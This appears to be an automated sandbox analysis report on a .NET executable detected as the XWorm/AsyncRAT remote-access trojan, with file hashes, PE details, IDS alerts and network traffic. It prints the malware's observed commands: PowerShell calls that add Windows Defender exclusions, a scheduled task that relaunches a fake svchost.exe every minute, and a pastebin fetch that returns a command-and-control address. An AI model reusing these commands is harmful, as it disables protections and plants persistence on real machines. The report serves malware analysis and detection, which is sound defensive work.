SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzrauljk.dhw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oi0bwfta.na3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcia4lvx.wkf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3prdmpy.2e1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_stk5v10g.y2p.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yevge1rc.ru3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ynrs1edu.1g5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

Download File

Process:	C:\Users\user\Desktop\a9YMw44iQq.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 6 20:51:52 2024, mtime=Fri Dec 6 20:51:52 2024, atime=Fri Dec 6 20:51:52 2024, length=82944, window=hide
Category:	dropped
Size (bytes):	663
Entropy (8bit):	4.600576133932817
Encrypted:	false
SSDEEP:	12:8MlEsc+sWFPQbeAVZhnpEjAfFIsbdytaz6mV:8kfIb5ZhnpQAxdy5m
MD5:	45004BDFD1304FDE846D4857036E42DE
SHA1:	936A0B60225349714B1AB95FB3300A15EC6AD290
SHA-256:	147D93165BA019E68B4C939B49817E2AB68F89E449E6DB7C6EC051FA58F8C6DE
SHA-512:	B16E420879DEBF0B0E65DA3BADB496BC167EC68E5D3896E5B49551C3465E969492AF978B51827402D68636329CBBF20105285AAFF4C64416EDAEED4A8F3A4641
Malicious:	false
Preview:	L..................F.... ......)H......)H......)H...D...........................P.O. .:i.....+00.../C:\...................`.1......YZ.. PROGRA~3..H......O.I.YZ.....g......................AR.P.r.o.g.r.a.m.D.a.t.a.....b.2..D...Y{. svchost.exe.H......Y{..Y{...........................T_..s.v.c.h.o.s.t...e.x.e.......I...............-.......H............zg?.....C:\ProgramData\svchost.exe..2.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.s.v.c.h.o.s.t...e.x.e.`.......X.......051829...........hT..CrF.f4... .Wt.B.....-...-$..hT..CrF.f4... .Wt.B.....-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.938591313720819
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	a9YMw44iQq.exe
File size:	82'944 bytes
MD5:	f068a2f351d11284fee8d768a64f6c9c
SHA1:	6fcba43b6b6024c8795d699f638444654714c276
SHA256:	4854a1611616f474d7241dc0268f913f92887a383a81e2dba1186c358cf93f22
SHA512:	856c01cfbde2b8a41564a77f07b5561d69679da6a0af8da86d6dc869309d04cabac0a06c37560456e8bf6dfa0f04e342b57f2afbcb5ddbf4d0bbe06944387ff2
SSDEEP:	1536:NfFb0NWmGRk7di8n/7IbDqS8a1gMGT6tVOUVprKsZ:NBrk7dHIbDMMJVOUVpdZ
TLSH:	AF837C6837F50115F1FF9FB54DE57252CE39BA631503E21F2486068A1B23A89CE907FA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*.Rg.................:...........X... ...`....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x41580e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6752A62A [Fri Dec 6 07:22:18 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x157bc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x16000	0x4e6	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x18000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x13814	0x13a00	8c409eb00004c08f9cf0ce504e7c270f	False	0.5831881966560509	SysEx File - Acoustic tech. lab.	6.002880993020355	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x16000	0x4e6	0x600	22e5b3e865386376fe448e03e99e0210	False	0.37890625	data	3.7736123929968417	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x18000	0xc	0x200	5daf18d07c1af61dbe95d1e3337735a4	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x160a0	0x25c	data			0.46192052980132453
RT_MANIFEST	0x162fc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-06T22:52:08.141883+0100	2855924	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.6	49819	5.166.171.54	5552	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 22:51:03.165565014 CET	49707	80	192.168.2.6	208.95.112.1
Dec 6, 2024 22:51:03.285433054 CET	80	49707	208.95.112.1	192.168.2.6
Dec 6, 2024 22:51:03.285573959 CET	49707	80	192.168.2.6	208.95.112.1
Dec 6, 2024 22:51:03.286602974 CET	49707	80	192.168.2.6	208.95.112.1
Dec 6, 2024 22:51:03.407682896 CET	80	49707	208.95.112.1	192.168.2.6
Dec 6, 2024 22:51:04.395129919 CET	80	49707	208.95.112.1	192.168.2.6
Dec 6, 2024 22:51:04.444439888 CET	49707	80	192.168.2.6	208.95.112.1
Dec 6, 2024 22:51:53.407927990 CET	49812	443	192.168.2.6	172.67.19.24
Dec 6, 2024 22:51:53.407998085 CET	443	49812	172.67.19.24	192.168.2.6
Dec 6, 2024 22:51:53.408072948 CET	49812	443	192.168.2.6	172.67.19.24
Dec 6, 2024 22:51:53.418723106 CET	49812	443	192.168.2.6	172.67.19.24
Dec 6, 2024 22:51:53.418773890 CET	443	49812	172.67.19.24	192.168.2.6
Dec 6, 2024 22:51:54.637290001 CET	443	49812	172.67.19.24	192.168.2.6
Dec 6, 2024 22:51:54.637474060 CET	49812	443	192.168.2.6	172.67.19.24
Dec 6, 2024 22:51:54.639420033 CET	49812	443	192.168.2.6	172.67.19.24
Dec 6, 2024 22:51:54.639436960 CET	443	49812	172.67.19.24	192.168.2.6
Dec 6, 2024 22:51:54.639687061 CET	443	49812	172.67.19.24	192.168.2.6
Dec 6, 2024 22:51:54.682162046 CET	49812	443	192.168.2.6	172.67.19.24
Dec 6, 2024 22:51:54.723336935 CET	443	49812	172.67.19.24	192.168.2.6
Dec 6, 2024 22:51:55.456990004 CET	443	49812	172.67.19.24	192.168.2.6
Dec 6, 2024 22:51:55.457091093 CET	443	49812	172.67.19.24	192.168.2.6
Dec 6, 2024 22:51:55.457149029 CET	49812	443	192.168.2.6	172.67.19.24
Dec 6, 2024 22:51:55.464077950 CET	49812	443	192.168.2.6	172.67.19.24
Dec 6, 2024 22:51:55.658900976 CET	49819	5552	192.168.2.6	5.166.171.54
Dec 6, 2024 22:51:55.779959917 CET	5552	49819	5.166.171.54	192.168.2.6
Dec 6, 2024 22:51:55.780040026 CET	49819	5552	192.168.2.6	5.166.171.54
Dec 6, 2024 22:51:55.843072891 CET	49819	5552	192.168.2.6	5.166.171.54
Dec 6, 2024 22:51:55.962853909 CET	5552	49819	5.166.171.54	192.168.2.6
Dec 6, 2024 22:52:08.141882896 CET	49819	5552	192.168.2.6	5.166.171.54
Dec 6, 2024 22:52:08.261718035 CET	5552	49819	5.166.171.54	192.168.2.6
Dec 6, 2024 22:52:08.487435102 CET	80	49707	208.95.112.1	192.168.2.6
Dec 6, 2024 22:52:08.487508059 CET	49707	80	192.168.2.6	208.95.112.1
Dec 6, 2024 22:52:17.697577000 CET	5552	49819	5.166.171.54	192.168.2.6
Dec 6, 2024 22:52:17.697669029 CET	49819	5552	192.168.2.6	5.166.171.54
Dec 6, 2024 22:52:19.508404016 CET	49819	5552	192.168.2.6	5.166.171.54
Dec 6, 2024 22:52:19.510521889 CET	49876	5552	192.168.2.6	5.166.171.54
Dec 6, 2024 22:52:19.628319979 CET	5552	49819	5.166.171.54	192.168.2.6
Dec 6, 2024 22:52:19.630286932 CET	5552	49876	5.166.171.54	192.168.2.6
Dec 6, 2024 22:52:19.630367994 CET	49876	5552	192.168.2.6	5.166.171.54
Dec 6, 2024 22:52:19.666707039 CET	49876	5552	192.168.2.6	5.166.171.54
Dec 6, 2024 22:52:19.786835909 CET	5552	49876	5.166.171.54	192.168.2.6
Dec 6, 2024 22:52:33.445259094 CET	49876	5552	192.168.2.6	5.166.171.54
Dec 6, 2024 22:52:33.565373898 CET	5552	49876	5.166.171.54	192.168.2.6
Dec 6, 2024 22:52:41.541754007 CET	5552	49876	5.166.171.54	192.168.2.6
Dec 6, 2024 22:52:41.541837931 CET	49876	5552	192.168.2.6	5.166.171.54
Dec 6, 2024 22:52:41.690944910 CET	49876	5552	192.168.2.6	5.166.171.54
Dec 6, 2024 22:52:41.722354889 CET	49923	5552	192.168.2.6	5.166.171.54
Dec 6, 2024 22:52:41.810880899 CET	5552	49876	5.166.171.54	192.168.2.6
Dec 6, 2024 22:52:41.842273951 CET	5552	49923	5.166.171.54	192.168.2.6
Dec 6, 2024 22:52:41.842340946 CET	49923	5552	192.168.2.6	5.166.171.54
Dec 6, 2024 22:52:41.958240986 CET	49923	5552	192.168.2.6	5.166.171.54
Dec 6, 2024 22:52:42.078116894 CET	5552	49923	5.166.171.54	192.168.2.6
Dec 6, 2024 22:52:44.418831110 CET	49707	80	192.168.2.6	208.95.112.1
Dec 6, 2024 22:52:44.538633108 CET	80	49707	208.95.112.1	192.168.2.6
Dec 6, 2024 22:52:52.195672035 CET	49923	5552	192.168.2.6	5.166.171.54
Dec 6, 2024 22:52:52.315463066 CET	5552	49923	5.166.171.54	192.168.2.6
Dec 6, 2024 22:53:02.305053949 CET	49923	5552	192.168.2.6	5.166.171.54
Dec 6, 2024 22:53:02.425018072 CET	5552	49923	5.166.171.54	192.168.2.6
Dec 6, 2024 22:53:03.745606899 CET	5552	49923	5.166.171.54	192.168.2.6
Dec 6, 2024 22:53:03.745793104 CET	49923	5552	192.168.2.6	5.166.171.54

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 22:51:03.012337923 CET	60130	53	192.168.2.6	1.1.1.1
Dec 6, 2024 22:51:03.156701088 CET	53	60130	1.1.1.1	192.168.2.6
Dec 6, 2024 22:51:53.269632101 CET	65145	53	192.168.2.6	1.1.1.1
Dec 6, 2024 22:51:53.406944036 CET	53	65145	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 6, 2024 22:51:03.012337923 CET	192.168.2.6	1.1.1.1	0xfa90	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:51:53.269632101 CET	192.168.2.6	1.1.1.1	0x4bdb	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 6, 2024 22:51:03.156701088 CET	1.1.1.1	192.168.2.6	0xfa90	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:51:53.406944036 CET	1.1.1.1	192.168.2.6	0x4bdb	No error (0)	pastebin.com	172.67.19.24	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:51:53.406944036 CET	1.1.1.1	192.168.2.6	0x4bdb	No error (0)	pastebin.com	104.20.4.235	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:51:53.406944036 CET	1.1.1.1	192.168.2.6	0x4bdb	No error (0)	pastebin.com	104.20.3.235	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pastebin.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49707	208.95.112.1	80	6216	C:\Users\user\Desktop\a9YMw44iQq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:51:03.286602974 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Dec 6, 2024 22:51:04.395129919 CET	175	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:51:03 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49812	172.67.19.24	443	6216	C:\Users\user\Desktop\a9YMw44iQq.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 21:51:54 UTC	74	OUT	GET /raw/vJmE27fr HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-12-06 21:51:55 UTC	391	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:51:55 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: EXPIRED Last-Modified: Fri, 06 Dec 2024 21:51:55 GMT Server: cloudflare CF-RAY: 8edf800028610c88-EWR
2024-12-06 21:51:55 UTC	23	IN	Data Raw: 31 31 0d 0a 35 2e 31 36 36 2e 31 37 31 2e 35 34 3a 35 35 35 32 0d 0a Data Ascii: 115.166.171.54:5552
2024-12-06 21:51:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	16:50:58
Start date:	06/12/2024
Path:	C:\Users\user\Desktop\a9YMw44iQq.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\a9YMw44iQq.exe"
Imagebase:	0x150000
File size:	82'944 bytes
MD5 hash:	F068A2F351D11284FEE8D768A64F6C9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3369216430.0000000002401000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2110037183.0000000000152000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2110037183.0000000000152000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	16:51:03
Start date:	06/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:51:03
Start date:	06/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	16:51:10
Start date:	06/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'a9YMw44iQq.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	16:51:10
Start date:	06/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	16:51:20
Start date:	06/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	16:51:20
Start date:	06/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	16:51:34
Start date:	06/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	16:51:34
Start date:	06/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	16:51:52
Start date:	06/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"
Imagebase:	0x7ff77b340000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	16:51:52
Start date:	06/12/2024
